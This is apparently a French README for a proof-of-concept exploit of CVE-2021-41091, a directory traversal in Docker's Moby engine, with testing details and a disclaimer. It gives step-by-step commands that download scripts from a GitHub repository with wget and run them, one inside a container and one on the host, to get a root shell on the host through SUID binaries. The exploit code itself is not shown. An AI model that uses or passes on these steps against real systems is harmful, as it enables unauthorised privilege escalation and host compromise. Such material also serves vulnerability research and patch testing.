
Preuve de concept d'exploitation pour CVE-2021-41091 : traversée de répertoire dans Moby (moteur Docker) permettant à des utilisateurs non privilégiés d'exécuter des binaires SUID depuis un conteneur sur l'hôte. Comprend des scripts PoC pour Ubuntu 20.04.
Un bug dans Moby (Docker Engine) permet aux utilisateurs non privilégiés de traverser les répertoires et d'exécuter des programmes directement depuis le docker sur la machine hôte. Si un programme suid existe dans le docker, l'utilisateur pourra l'exécuter en tant que suid sur la machine hôte.
Dans le terminal du conteneur, téléchargez le fichier docker.sh, puis exécutez-le en tant qu'utilisateur root :
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
Maintenant, sur la machine hôte, téléchargez le fichier principal.sh et exécutez-le :
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
Exécutez la commande qui sera fournie par le fichier et nous serons capables d'exécuter la /bin/bash en tant que root.
Ces scripts ont été testés sur Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) avec la version de Moby 20.10.5+dfsg1.
L'UTILISATION DE CE RÉPERTOIRE EST SOUS LA RESPONSABILITÉ DE CELUI QUI L'UTILISE ET NON DE L'AUTEUR.